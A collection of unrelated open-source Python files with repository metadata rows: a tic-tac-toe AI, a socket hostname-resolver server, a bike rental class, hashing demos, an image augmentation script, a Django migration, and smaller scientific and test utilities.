global_step = tf.Variable(0, dtype=tf.int64)
tf.summary.experimental.set_step(global_step)
with summary_writer.as_default():
running_losses = []
running_estimates = []
for step in range(num_steps):
loss = estimator.train_step()[0]
running_losses.append(loss)
global_step.assign_add(1)
if step % 500 == 0 or step == num_steps - 1:
print('step', step, 'losses', np.mean(running_losses, 0))
estimate = estimator.estimate_average_reward(dataset, target_policy)
tf.debugging.check_numerics(estimate, 'NaN in estimate')
running_estimates.append(estimate)
tf.print('est', tf.math.reduce_mean(estimate),
tf.math.reduce_std(estimate))
running_losses = []
if save_dir is not None:
with tf.io.gfile.GFile(os.path.join(save_dir, 'results.npy'), 'w') as f:
np.save(f, running_estimates)
print('saved results to %s' % save_dir)
print('Done!')
if __name__ == '__main__':
app.run(main)
| [
"copybara-worker@google.com"
] | copybara-worker@google.com |
ceabc15d9478f8383faa3bce689875d157882138 | 56d3afdc5307ddaad2281d75ebeecf6ad499cf3a | /tic_tac_toe.py | 501e6ec6e4b1685fea2de71408f0de0c2d10405e | [] | no_license | ianbrayoni/tictactoe | 5cb64ee19b48cb7c901ae86accdc84ca527311ce | ed2563db15d7b791b7f0c32e87d1751a26030445 | refs/heads/master | 2022-12-10T07:51:59.910314 | 2020-01-28T18:25:17 | 2020-01-28T18:25:17 | 161,775,273 | 3 | 0 | null | 2022-12-08T03:30:57 | 2018-12-14T11:25:04 | Python | UTF-8 | Python | false | false | 6,972 | py | import random
X = "x"
O = "o"
EMPTY = " "
NUM_BOARD_POSITIONS = 9
WINNING_POSITIONS = (
(1, 2, 3),
(4, 5, 6),
(7, 8, 9),
(1, 4, 7),
(2, 5, 8),
(3, 6, 9),
(3, 5, 7),
(1, 5, 9),
)
def create_board(str_board):
"""
Convert string representation of the tictactoe board into a list
List will have one extra item at the beginning so that board/grid
positions can be referenced from 1 - refer to move_handler()
>> create_board(" xxo o x")
[' ', ' ', 'x', 'x', 'o', ' ', ' ', 'o', ' ', 'x']
:param str_board: str (string representation of the tictactoe board)
:returns: list
"""
board = [" "] + list(str_board)
return board
def winning_move(board):
"""
Check for possible winning moves
:param board: list representation of the tictactoe game
:returns: True or False
"""
for row in WINNING_POSITIONS:
if board[row[0]] == board[row[1]] == board[row[2]] != EMPTY:
return True
return False
def move_handler(board):
"""
Determine which move to make from list of available moves
Uses the following stategy:
1. If any corner slots are available, make a move into one of them
2. If no corner slot is available but center is free, take center spot
3. Move into an edge iff corners and center not available
>> move_handler([' ', ' ', 'x', 'x', 'o', ' ', ' ', 'o', ' ', ' '])
1
:param board: list representaion of the tictactoe board
:returns: int - the index to make a move to
"""
if win(board):
return win(board)
elif block_x_win(board):
return block_x_win(board)
else:
available_moves = [
idx for idx, letter in enumerate(board) if letter == EMPTY and idx != 0
]
# if board elements read from 0, this condition fails - if 0: False
# yet 0 is a valid position in a 0-indexed list
if play_corners(available_moves):
return play_corners(available_moves)
if play_center(available_moves):
return play_center(available_moves)
if play_edges(available_moves):
return play_edges(available_moves)
def win(board):
"""
Make a winning move for O if its obvious to do so
:param board: list representaion of the tictactoe board
:returns: int - the index to make a move to
"""
return check_for_possible_win(board, O)
def block_x_win(board):
"""
Block X's move if no winning move available for O
:param board: list representaion of the tictactoe board
:returns: int - the index to make a move to
"""
return check_for_possible_win(board, X)
def check_for_possible_win(board, letter):
"""
Given a letter, check whether it occurs one after the other e.g
['x', 'x', ' ']
:param board: list representaion of the tictactoe board
:param letter: str to check for
:returns: int - the index to make a move to
"""
for row in WINNING_POSITIONS:
if letter == board[row[0]] == board[row[1]]:
move = row[2]
break
elif letter == board[row[0]] == board[row[2]]:
move = row[1]
break
elif letter == board[row[1]] == board[row[2]]:
move = row[0]
break
return move
def play_corners(possible_moves):
"""
Check if there is a possible move in list of corner indices [1, 3, 7, 9]
If any corner slots are available, make a move into one of them
>> play_corners([1, 4, 7, 8])
1 (or 7)
:param possible_moves: list - empty slots on the board
:returns: int - randomly selected position to be occupied
"""
corners = [1, 3, 7, 9]
available_corners = []
for idx in possible_moves:
if idx in corners:
available_corners.append(idx)
if len(available_corners) > 0:
return select_any(available_corners)
def play_edges(possible_moves):
"""
Check if there is a possible move in list of edge indices [2, 4, 6, 8]
If any edge slots are available, make a move into one of them
>> play_edges([1, 2, 5])
2
:param possible_moves: list - empty slots on the board
:returns: int - randomly selected position to be occupied
"""
edges = [2, 4, 6, 8]
available_edges = []
for idx in possible_moves:
if idx in edges:
available_edges.append(idx)
if len(available_edges) > 0:
return select_any(available_edges)
def play_center(possible_moves):
"""
Check if there is a possible move corresponding to center index - 4
If center slot is available, make a move into it
>> play_center([5, 8])
5
:param possible_moves: list - empty slots on the board
:returns: int - center spot
"""
if 5 in possible_moves:
return 5
def select_any(lst):
"""
Return random value from list
>>select_any([1, 3, 5])
1 (or 3 or 5)
:param lst: list - available edges/corners
:returns: int - where to move to
"""
r = random.randrange(0, len(lst))
return lst[r]
def play(board):
"""
Given a move, update the board and return a string representation
of the board
>> play([' ', ' ', 'x', 'x', 'o', ' ', ' ', 'o', ' ', ' '])
' xxo o o'
:param board: list representation of the tictactoe board
:returns: str - string representation of the tictactoe board
"""
pos = move_handler(board)
if pos:
board[pos] = O
# return string of 9 elements, rem our array has 10 elements
return "".join(board[1:])
def is_safe_to_play(str_board):
"""
A couple of checks ascertaining whether its safe to play
Checks are done against the string representation of the tictactoe board
1. Expected characters are: ' ' or 'x' or 'o'
2. String has to be of nine characters, no more no less
3. If there's already a winner, no point to play
4. Players take turns to play, one can only be one move ahead
5. Board should not be full
>> is_safe_to_play(" xxo o x")
True
:param str_board: str - string representation of the tictactoe board
:returns: Boolean - True if safe to play, otherwise False
"""
if not set(str_board).issubset({X, O, EMPTY}):
return False
if len(str_board) != NUM_BOARD_POSITIONS:
return False
board = create_board(str_board)
if winning_move(board):
return False
x_count = (board[1:]).count(X)
o_count = (board[1:]).count(O)
if (x_count - o_count > 1) or (o_count - x_count > 1):
return False
if (board[1:]).count(EMPTY) == 0:
return False
return True
def main():
board_state = input("Enter the board state: ")
if is_safe_to_play(board_state):
board = create_board(board_state)
return play(board)
else:
return "Invalid board state!"
if __name__ == "__main__":
main()
| [
"ian.baraza@jumo.world"
] | ian.baraza@jumo.world |
27a2b8233ca588d5ce1b4954241ac87f2ee31b23 | 99e44f844d78de330391f2b17bbf2e293bf24b1b | /pytorch/tools/autograd/nested_dict.py | e1e09814199153aa94647c2246c983b2ba3ea303 | [
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"Apache-2.0",
"BSD-2-Clause",
"MIT"
] | permissive | raghavnauhria/whatmt | be10d57bcd6134dd5714d0c4058abd56a1b35a13 | c20483a437c82936cb0fb8080925e37b9c4bba87 | refs/heads/master | 2022-12-04T05:39:24.601698 | 2019-07-22T09:43:30 | 2019-07-22T09:43:30 | 193,026,689 | 0 | 1 | MIT | 2022-11-28T17:50:19 | 2019-06-21T03:48:20 | C++ | UTF-8 | Python | false | false | 581 | py | # TODO: refactor nested_dict into common library with ATen
class nested_dict(object):
"""
A nested dict is a dictionary with a parent. If key lookup fails,
it recursively continues into the parent. Writes always happen to
the top level dict.
"""
def __init__(self, base, parent):
self.base, self.parent = base, parent
def __contains__(self, item):
return item in self.base or item in self.parent
def __getitem__(self, x):
r = self.base.get(x)
if r is not None:
return r
return self.parent[x]
| [
"rnauhria@gmail.com"
] | rnauhria@gmail.com |
21b9c22f7f7d443ed421bf0db7af633c519aeda9 | 3849a67138f907e9336a2bfceda43057cb28e916 | /utilities/manual_augmentation.py | d06b3640c64897a6712c6f77502e0fe7bf17448d | [] | no_license | wallacelibrary/OCR-Handwriting | ccb47bdc8f58e5f4514fb47831e76a5404d9c2e7 | a02b9982c9db7fa3c193dec07d808762da4e1b74 | refs/heads/master | 2022-05-08T13:02:44.403883 | 2019-08-16T18:37:55 | 2019-08-16T18:37:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,684 | py | # -*- coding: utf-8 -*-
"""
Created on Tue Jul 16 09:55:22 2019
@author: matth
"""
root_dir = r'C:\Users\matth\Documents\GitHub\OCR-Handwriting\bin\src\testing\convnet-smallset-ocr-test3\testing-data\original-sets'
from scipy import ndarray
import random
import skimage as sk
from skimage import transform
from skimage import util
import os
sub_folders = [os.path.join(root_dir,folder) for folder in os.listdir(root_dir)]
num_files_desired = 250
def random_rotation(image_array: ndarray):
rand_degree = random.uniform(-25, 25)
return sk.transform.rotate(image_array, rand_degree)
def random_noise(image_array: ndarray):
return sk.util.random_noise(image_array)
def horizontal_flip(image_array: ndarray):
return image_array[:, ::-1]
avail_transforms = {
'rotate' : random_rotation,
'noise' : random_noise,
'horizontal_flip' : horizontal_flip
}
for folder in sub_folders:
images = [os.path.join(folder, pic) for pic in os.listdir(folder)]
generated = 0
while generated <= num_files_desired:
transformed = None
image = random.choice(images)
imgarray = sk.io.imread(image)
num_transforms = 0
t = random.randint(1, len(avail_transforms))
while num_transforms <= t:
key = random.choice(list(avail_transforms))
imgarray = avail_transforms[key](imgarray)
num_transforms+=1
generated+=1
name = 'augmented_' + str(generated) + '.png'
newfile= os.path.join(folder, name)
sk.io.imsave(newfile, imgarray)
print('Generated ', generated, ' images for ', folder)
| [
"32942111+mattlm0831@users.noreply.github.com"
] | 32942111+mattlm0831@users.noreply.github.com |
99286b2ac35687ea7459db1976eefff58c6ac283 | 3a3c7ab7d9cadfc5610888e07dbb9d6eaaf8aa01 | /scripts/OpenFOAM/generateBodyOBJFile.py | b2dfdaab64702e895cf9fb115ccd64fdb7f598dc | [
"MIT"
] | permissive | cubayang/snake | 7e430e8bcbf4acf99c007e5c1a646e0e6f45280c | f78844235f4d9b815b53a707f276dd634bce7a07 | refs/heads/master | 2021-01-17T20:24:27.359901 | 2016-08-18T00:34:18 | 2016-08-18T00:34:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,641 | py | # file: generateBodyOBJFile.py
# author: Olivier Mesnard (mesnardo@gwu.edu)
# brief: Convert input coordinates file into a OBJ file.
import os
import argparse
from snake.openfoam import OBJFile
from snake import miscellaneous
def parse_command_line():
"""Parses the command-line."""
print('[info] parsing command-line ...'),
# create the parser
parser = argparse.ArgumentParser(description='Generates an .OBJ file '
'that will be readable by OpenFOAM '
'mesh generator: SnappyHexMesh',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
# parser = argparse.ArgumentParser(description='Generates an .OBJ file '
# 'that will be readable by OpenFOAM '
# 'mesh generator: SnappyHexMesh')
# fill the parser with arguments
parser.add_argument('--file', dest='file_path',
type=str,
metavar=('<path>'),
help='path of the coordinates file to convert')
parser.add_argument('--name', dest='name',
type=str,
metavar=('<name>'),
help='name of the .OBJ file generated (no extension)')
parser.add_argument('--extrusion-limits', dest='extrusion_limits',
type=float, nargs=2,
default=[0.0, 1.0],
metavar=('start', 'end'),
help='limits of the extrusion in the 3rd direction')
parser.add_argument('--save-directory', dest='save_directory',
type=str,
default=os.getcwd(),
metavar=('<directory>'),
help='directory where to save the .obj file')
# parse given options file
parser.add_argument('--options',
type=open, action=miscellaneous.ReadOptionsFromFile,
metavar=('<path>'),
help='path of the file with options to parse')
print('done')
return parser.parse_args()
def main():
"""Generates an .OBJ file from a given coordinates file."""
args = parse_command_line()
body = OBJFile.Body2d(args.file_path,
name=args.name,
extrusion_limits=args.extrusion_limits)
body.write(save_directory=args.save_directory)
if __name__ == '__main__':
print('\n[{}] START\n'.format(os.path.basename(__file__)))
main()
print('\n[{}] END\n'.format(os.path.basename(__file__))) | [
"mesnardo@gwu.edu"
] | mesnardo@gwu.edu |
0f02c25f0dcf3729964ffb43624483cced191392 | 903e81d4f5c9a6067df4df987213478ed16f67f6 | /Bike_Rental_System/BikeRental.py | ec33d4e7220dd8014455b40ec6150c2968e774cc | [] | no_license | imdadhaq/Oop-Bike-Rental-System | d873a8e3dc874f79939f89f51838648dab4b2494 | 3a85703524b54e011dec9219aaedda3a46a1e038 | refs/heads/main | 2023-07-08T22:38:53.096250 | 2021-08-09T15:41:13 | 2021-08-09T15:41:13 | 394,348,132 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,204 | py | import datetime
class BikeRental:
# initialize stock
def __init__(self, stock=0):
self.stock = stock
# Display the Bikes are currently available
def displaystock(self):
print("We have Currently {} bikes avaiable to rent ".format(self.stock))
return self.stock
# Rent bike on basis of hour
def rentbikeOnhour(self, n):
if n <= 0:
print("Number of Bikes Should be positive ")
return None
elif n > self.stock:
print("Sorry! We have currently {} bikes available to rent.".format(self.stock))
return None
else:
now = datetime.datetime.now()
print("you have ranted a {} Bikes(s) on a hourly basis today {} at hours ".format(n, now.hour))
print("You will be charged $5 for each hour per bike ")
print("We hope that you enjoy our service")
self.stock -= n
return now
def rentbikeOndaily(self, n):
if n <= 0:
print("Number of Bikes Should be positive ")
return None
elif n > self.stock:
print("Sorry! We have currently {} bikes available to rent.".format(self.stock))
return None
else:
now = datetime.datetime.now()
print("you have ranted a {} Bikes(s) on daily basis today {} at hours ".format(n, now.hour))
print("You will be charged $5 for each hour per bike ")
print("We hope that you enjoy our service")
self.stock -= n
return now
def rentbikeOnWeek(self, n):
if n <= 0:
print("Number of Bikes Should be positive ")
return None
elif n > self.stock:
print("Sorry! We have currently {} bikes available to rent.".format(self.stock))
return None
else:
now = datetime.datetime.now()
print("you have ranted a {} Bikes(s) on Weekly basis today {} at hours ".format(n, now.hour))
print("You will be charged $5 for each hour per bike ")
print("We hope that you enjoy our service")
self.stock -= n
return now
def returnBike(self, request):
"""
1. Accept a rented bike from a customer
2. Replensihes the inventory
3. Return a bill
"""
rentalTime, rentalBasis, numOfBikes = request
bill = 0
if rentalTime and rentalBasis and numOfBikes:
self.stock += numOfBikes
now = datetime.datetime.now()
rentalPeriod = now - rentalTime
# hourly bill calculation
if rentalBasis == 1:
bill = round(rentalPeriod.seconds / 3600) * 5 * numOfBikes
# daily bill calculation
if rentalBasis == 2:
bill = round(rentalPeriod.days) * 20 * numOfBikes
# weekly bill calculation
if rentalBasis == 3:
bill = round(rentalPeriod.days / 7) * 60 * numOfBikes
if (3 <= numOfBikes <= 5):
print("YOu are eligible for family rental promotion of 30% discount")
bill = bill * 0.7
print("Thanks for returning your bike. Hope you enjoyed our service!")
print("That would be ${}".format(bill))
else:
print("Are you sure you rented a bike with us?")
return None
class Customer:
def __init__(self):
self.bike = 0
self.rentalBasis = 0
self.rentalTime = 0
self.bill = 0
def requestBike(self):
try:
bikes = int(input("how many bikes would you like to rent?"))
except ValueError:
print("That's not a postive integer ")
return -1
if bikes < 1:
print("Invalid input .Number of Bikes should be greater than zero !")
return -1
else:
self.bikes = bikes
return self.bikes
def returnBike(self):
if self.rentalBasis and self.rentalTime and self.bikes:
return self.rentalBasis and self.rentalTime and self.bikes
else:
return 0, 0, 0
| [
"imdadhaque2210@gmail.com"
] | imdadhaque2210@gmail.com |
12d4cddcaf7218ea7fe7c363f8c5fb94f5bcd2e0 | 1688311b1287e9d38e27a44388f50568d9e07ea2 | /blog/migrations/0007_auto_20190722_1243.py | 8f8bf2ccf0851b2052ef4963725ead7c1d81589d | [] | no_license | Leeheejin1/teamprjt | e7e606b9411fde1b772f02ac27350304085a545a | 8d3ab815b143597f6c2d4e912ef8a1549abb516d | refs/heads/master | 2022-12-12T11:54:48.500322 | 2019-07-25T06:33:24 | 2019-07-25T06:33:24 | 198,760,424 | 0 | 0 | null | 2022-12-08T05:55:41 | 2019-07-25T05:00:13 | JavaScript | UTF-8 | Python | false | false | 1,129 | py | # Generated by Django 2.2 on 2019-07-22 03:43
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('blog', '0006_auto_20190531_1715'),
]
operations = [
migrations.AlterField(
model_name='post',
name='author',
field=models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
migrations.CreateModel(
name='Comment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('comment_date', models.DateTimeField(auto_now_add=True)),
('comment_contents', models.CharField(max_length=200)),
('post', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='comments', to='blog.Post')),
],
options={
'ordering': ['-id'],
},
),
]
| [
"dlgmlwls3133@naver.com"
] | dlgmlwls3133@naver.com |
c7432b46e7815589e67b5f13126792906baa874b | 711756b796d68035dc6a39060515200d1d37a274 | /output_cog_tags/optimized_659.py | 2a149860964006fc23b9d40cde8de4ed76a7020a | [] | no_license | batxes/exocyst_scripts | 8b109c279c93dd68c1d55ed64ad3cca93e3c95ca | a6c487d5053b9b67db22c59865e4ef2417e53030 | refs/heads/master | 2020-06-16T20:16:24.840725 | 2016-11-30T16:23:16 | 2016-11-30T16:23:16 | 75,075,164 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,583 | py | import _surface
import chimera
try:
import chimera.runCommand
except:
pass
from VolumePath import markerset as ms
try:
from VolumePath import Marker_Set, Link
new_marker_set=Marker_Set
except:
from VolumePath import volume_path_dialog
d= volume_path_dialog(True)
new_marker_set= d.new_marker_set
marker_sets={}
surf_sets={}
if "Cog1_Anch" not in marker_sets:
s=new_marker_set('Cog1_Anch')
marker_sets["Cog1_Anch"]=s
s= marker_sets["Cog1_Anch"]
mark=s.place_marker((513.189, 440.035, 538.548), (0, 0, 1), 21.9005)
if "Cog2_GFPN" not in marker_sets:
s=new_marker_set('Cog2_GFPN')
marker_sets["Cog2_GFPN"]=s
s= marker_sets["Cog2_GFPN"]
mark=s.place_marker((570.351, 361.611, 332.233), (1, 0.5, 0), 21.9005)
if "Cog2_GFPC" not in marker_sets:
s=new_marker_set('Cog2_GFPC')
marker_sets["Cog2_GFPC"]=s
s= marker_sets["Cog2_GFPC"]
mark=s.place_marker((553.44, 456.734, 234.315), (1, 0.5, 0), 21.9005)
if "Cog2_Anch" not in marker_sets:
s=new_marker_set('Cog2_Anch')
marker_sets["Cog2_Anch"]=s
s= marker_sets["Cog2_Anch"]
mark=s.place_marker((596.433, 688.793, 431.456), (1, 0.5, 0), 21.9005)
if "Cog3_GFPN" not in marker_sets:
s=new_marker_set('Cog3_GFPN')
marker_sets["Cog3_GFPN"]=s
s= marker_sets["Cog3_GFPN"]
mark=s.place_marker((565.199, 405.652, 345.85), (1, 0.87, 0), 21.9005)
if "Cog3_GFPC" not in marker_sets:
s=new_marker_set('Cog3_GFPC')
marker_sets["Cog3_GFPC"]=s
s= marker_sets["Cog3_GFPC"]
mark=s.place_marker((579.294, 381.001, 348.501), (1, 0.87, 0), 21.9005)
if "Cog3_Anch" not in marker_sets:
s=new_marker_set('Cog3_Anch')
marker_sets["Cog3_Anch"]=s
s= marker_sets["Cog3_Anch"]
mark=s.place_marker((368.44, 406.247, 367.378), (1, 0.87, 0), 21.9005)
if "Cog4_GFPN" not in marker_sets:
s=new_marker_set('Cog4_GFPN')
marker_sets["Cog4_GFPN"]=s
s= marker_sets["Cog4_GFPN"]
mark=s.place_marker((448.219, 577.439, 439.358), (0.97, 0.51, 0.75), 21.9005)
if "Cog4_GFPC" not in marker_sets:
s=new_marker_set('Cog4_GFPC')
marker_sets["Cog4_GFPC"]=s
s= marker_sets["Cog4_GFPC"]
mark=s.place_marker((307.69, 553.195, 375.403), (0.97, 0.51, 0.75), 21.9005)
if "Cog4_Anch" not in marker_sets:
s=new_marker_set('Cog4_Anch')
marker_sets["Cog4_Anch"]=s
s= marker_sets["Cog4_Anch"]
mark=s.place_marker((783.564, 349.669, 391.617), (0.97, 0.51, 0.75), 21.9005)
if "Cog5_GFPN" not in marker_sets:
s=new_marker_set('Cog5_GFPN')
marker_sets["Cog5_GFPN"]=s
s= marker_sets["Cog5_GFPN"]
mark=s.place_marker((574.444, 482.119, 400.257), (0.39, 0.31, 0.14), 21.9005)
if "Cog5_GFPC" not in marker_sets:
s=new_marker_set('Cog5_GFPC')
marker_sets["Cog5_GFPC"]=s
s= marker_sets["Cog5_GFPC"]
mark=s.place_marker((585.011, 387.232, 281.884), (0.39, 0.31, 0.14), 21.9005)
if "Cog5_Anch" not in marker_sets:
s=new_marker_set('Cog5_Anch')
marker_sets["Cog5_Anch"]=s
s= marker_sets["Cog5_Anch"]
mark=s.place_marker((580.031, 621.288, 368.759), (0.39, 0.31, 0.14), 21.9005)
if "Cog6_GFPN" not in marker_sets:
s=new_marker_set('Cog6_GFPN')
marker_sets["Cog6_GFPN"]=s
s= marker_sets["Cog6_GFPN"]
mark=s.place_marker((579.496, 421.971, 322.229), (0.6, 0.31, 0.64), 21.9005)
if "Cog6_GFPC" not in marker_sets:
s=new_marker_set('Cog6_GFPC')
marker_sets["Cog6_GFPC"]=s
s= marker_sets["Cog6_GFPC"]
mark=s.place_marker((561.886, 406.09, 420.253), (0.6, 0.31, 0.64), 21.9005)
if "Cog6_Anch" not in marker_sets:
s=new_marker_set('Cog6_Anch')
marker_sets["Cog6_Anch"]=s
s= marker_sets["Cog6_Anch"]
mark=s.place_marker((410.629, 371.023, 343.742), (0.6, 0.31, 0.64), 21.9005)
if "Cog7_GFPN" not in marker_sets:
s=new_marker_set('Cog7_GFPN')
marker_sets["Cog7_GFPN"]=s
s= marker_sets["Cog7_GFPN"]
mark=s.place_marker((602.083, 424.911, 407.51), (0.89, 0.1, 0.1), 21.9005)
if "Cog7_GFPC" not in marker_sets:
s=new_marker_set('Cog7_GFPC')
marker_sets["Cog7_GFPC"]=s
s= marker_sets["Cog7_GFPC"]
mark=s.place_marker((622.903, 431.478, 254.626), (0.89, 0.1, 0.1), 21.9005)
if "Cog7_Anch" not in marker_sets:
s=new_marker_set('Cog7_Anch')
marker_sets["Cog7_Anch"]=s
s= marker_sets["Cog7_Anch"]
mark=s.place_marker((540.708, 579.704, 242.646), (0.89, 0.1, 0.1), 21.9005)
if "Cog8_GFPC" not in marker_sets:
s=new_marker_set('Cog8_GFPC')
marker_sets["Cog8_GFPC"]=s
s= marker_sets["Cog8_GFPC"]
mark=s.place_marker((602.373, 438.065, 358.834), (0.3, 0.69, 0.29), 21.9005)
if "Cog8_Anch" not in marker_sets:
s=new_marker_set('Cog8_Anch')
marker_sets["Cog8_Anch"]=s
s= marker_sets["Cog8_Anch"]
mark=s.place_marker((660.617, 589.743, 366.602), (0.3, 0.69, 0.29), 21.9005)
for k in surf_sets.keys():
chimera.openModels.add([surf_sets[k]])
| [
"batxes@gmail.com"
] | batxes@gmail.com |
191c02bf89080200ebe8e1069aea04fcdc50c317 | 0c9918f2e14ea5f63f6780ddcb24ae38fd98d1e7 | /sha.py | aaa1d6155e4148af04137a197c272ddf99954b5f | [] | no_license | oguzpamuk/oguzpamuk.com | 73889fc4b7439f83bab23b7604de4792fcf661f6 | a99d1e862f89b9be850b6beb25bef50a9ce4a163 | refs/heads/master | 2020-05-23T08:05:23.585172 | 2016-11-12T13:02:08 | 2016-11-12T13:02:08 | 69,728,060 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 932 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
'''
Author : Oguz Pamuk
Date : 12.11.2016
'''
import hashlib
def getSHA1ValueForString(plaintext):
instance = hashlib.sha1()
instance.update(plaintext)
return instance.hexdigest()
def getSHA224ValueForString(plaintext):
instance = hashlib.sha224()
instance.update(plaintext)
return instance.hexdigest()
def getSHA256ValueForString(plaintext):
instance = hashlib.sha256()
instance.update(plaintext)
return instance.hexdigest()
def getSHA384ValueForString(plaintext):
instance = hashlib.sha384()
instance.update(plaintext)
return instance.hexdigest()
def getSHA512ValueForString(plaintext):
instance = hashlib.sha512()
instance.update(plaintext)
return instance.hexdigest()
print getSHA1ValueForString("oguz")
print getSHA224ValueForString("oguz")
print getSHA256ValueForString("oguz")
print getSHA384ValueForString("oguz")
print getSHA512ValueForString("oguz")
| [
"oguzcanpamuk@gmail.com"
] | oguzcanpamuk@gmail.com |
b0e2004c44bed1e345528f2bcf3f3a675e16cb6e | ccbfc3dcc7fdd7b1cf245cadbc1b73f555ba1912 | /.pybuilder/plugins/cpython-3.6.9.final.0/bin/flake8 | 85ae548865b7e6570e57b01064285b6ebd58e6ab | [] | no_license | dwalke22/cs3280Project5 | 028b4655b7d3433a018838052ac2bd34ad9665d1 | b73187ad348afa6f8c3164a28e5b3caff2c8420b | refs/heads/master | 2023-01-19T22:35:42.196076 | 2020-12-02T18:40:58 | 2020-12-02T18:40:58 | 316,641,730 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 288 | #!/home/dwalke22/Desktop/cs3280Project5/.pybuilder/plugins/cpython-3.6.9.final.0/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from flake8.main.cli import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"dwalke22@cs3280-vm10.uwg.westga.edu"
] | dwalke22@cs3280-vm10.uwg.westga.edu | |
4771d33f450e1a572a88312fad7e53a8ee9587d5 | 288710df36e1fc95f34a8b550ab7c26e59067af7 | /Naming_Service_Project /server.py | e9b2be55068be83ec6d834e82be73c9564bfc808 | [] | no_license | nadrane/LearnC | 0b0f25cdf89f20292d402d60a785a51a6e06062f | 9f0d67c0ee66111052d20e8e029307317c5891bc | refs/heads/master | 2020-04-10T19:08:06.423197 | 2015-03-04T15:22:14 | 2015-03-04T15:22:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,566 | py | import socket
import threading
import signal
MAX_RECEIVE_LENGTH = 2048
class StoppableThread(threading.Thread):
"""Thread class with a stop() method. The thread itself has to check
regularly for the stopped() condition."""
def __init__(self, *args, **kwargs):
super(StoppableThread, self).__init__(*args, **kwargs)
self._stop = threading.Event()
def stop(self):
self._stop.set()
def stopped(self):
return self._stop.is_set()
class SocketHoldingThread(StoppableThread):
def __init__(self, socket, *args, **kwargs):
super(SocketHoldingThread, self).__init__(*args, **kwargs)
self.socket = socket
def terminate(self):
# Close the open socket
try:
self.socket.shutdown(socket.SHUT_RDWR)
self.socket.close()
# There are going to be cases where we accidentally try to close the socket twice
# e.g., the process is killed, and the parent and child both try to close it
except OSError:
pass
self.stop()
def run_server():
thread_list= [] # A list of all open client conncetions. Stores type Connection
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# We need to create a closure here so that clean_up (a signal handler) has access to the stored threads.
# This is necessary because we cannot explicitly pass parametes to handlers.
# The alternative is that thread_list is global
def clean_up(signal, frame):
# Iterate only over threads that are still running.
# Threads can shut themselves down without notifying the parent again (when close to sent).
# We don't need to trying closing the sockets associated with those threads a second time.
for thread in filter(lambda x: not x.stopped(), thread_list):
thread.terminate()
server_socket.close()
return
# Set the signal handler for
signal.signal(signal.SIGINT, clean_up)
# Reuse sockets that are in the TIME_WAIT state. This setting lets us rapidly shutdown the program and restart it.
# http://serverfault.com/questions/329845/how-to-forcibly-close-a-socket-in-time-wait
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# bind the socket to a public host, and a well-known port
server_socket.bind(('127.0.0.1', 8000))
# become a server socket
server_socket.listen(5)
while True:
print ('Waiting for additional client')
# The program will be exited by using a ctrl-c command.
# When this happpens server_socket.accept fails ungracefully and raises an EINTR
# Catch this and gracefully kill off the child threads and close the open sockets
try:
client_socket, address = server_socket.accept()
# This happened from click ctrl-c. The signal handler will actually close
# all of the connections before this exception is handled, so no need to close them again
except InterruptedError:
return
print ('New connection established')
client_socket.send('Thank you for connecting to the server\n'.encode('ascii'))
# Create a new thread to handle the domain name resolution process.
new_thread = SocketHoldingThread(socket=client_socket, target=address_resolver)
thread_list.append(new_thread)
new_thread.start()
def address_resolver():
current_thread = threading.current_thread()
client_socket = current_thread.socket
while not current_thread.stopped():
current_thread.socket.sendall('Please enter a domain name\n'.encode('ascii'))
# If this fails, just sever the connection with the client
try:
response = client_socket.recv(MAX_RECEIVE_LENGTH).decode('ascii')
except OSError:
current_thread.terminate()
break
# Telnet likes to append a pesky line feed. Let's get rid of it
response = response.rstrip()
if response == 'close':
current_thread.terminate()
break
print ('Looking up hostname {}'.format(response))
ip_address = socket.gethostbyname(response)
# If this fails, just sever the connection with the client
try:
client_socket.sendall('The ip address is {ip_address}\n'.format(ip_address=ip_address).encode('ascii'))
except OSError:
current_thread.terminate()
break
return
if __name__ == "__main__":
run_server()
| [
"nicholasdrane@gmail.com"
] | nicholasdrane@gmail.com |
46c542c9c5dd88deb06d9cc8b2a7920ee17809fd | 08642798431f3dda1cf0529acb4435c9f38f3140 | /tests/RunTest.py | 10fb7c0152f524d5994ef0b3c873b5e8aca326b9 | [
"MIT"
] | permissive | dsoon/pseudonaja | 13bb11938d7c9483a42351624a802b97468190ca | 2c94ba82efaae9bdf2b3f80d4f31b35b467c7d93 | refs/heads/master | 2023-08-26T18:27:58.365955 | 2021-10-20T12:29:32 | 2021-10-20T12:29:32 | 356,291,608 | 1 | 1 | MIT | 2021-10-20T11:27:33 | 2021-04-09T14:04:21 | Python | UTF-8 | Python | false | false | 1,695 | py | import sys, os
sys.path += ['pseudonaja']
print(os.getcwd())
import pseudonaja.c.PInterpreter as pscint
import json
class RunTest:
class Keyboard:
def __init__(self, inputs):
self.lines = inputs
self.count = -1
def readline(self):
self.count += 1
return self.lines[self.count]
class Screen:
def __init__(self):
self.lines = []
def write(self, line):
self.lines.append(line)
def flush(self):
'''
'''
pass
def __str__(self):
return "".join(self.lines)
def compare(self, name, outputs, screen):
outputs = "".join(outputs)
'''
def dump(a, e):
for i, c in enumerate(a):
print(f"{i} a={c} e={outputs[i] if i < len(outputs) else None}")
dump(''.join(self.lines), outputs)
'''
assert ''.join(self.lines) == outputs, f"Test failed ({name})\n\nTest output\n{screen}\n\nExpected output\n{outputs}"
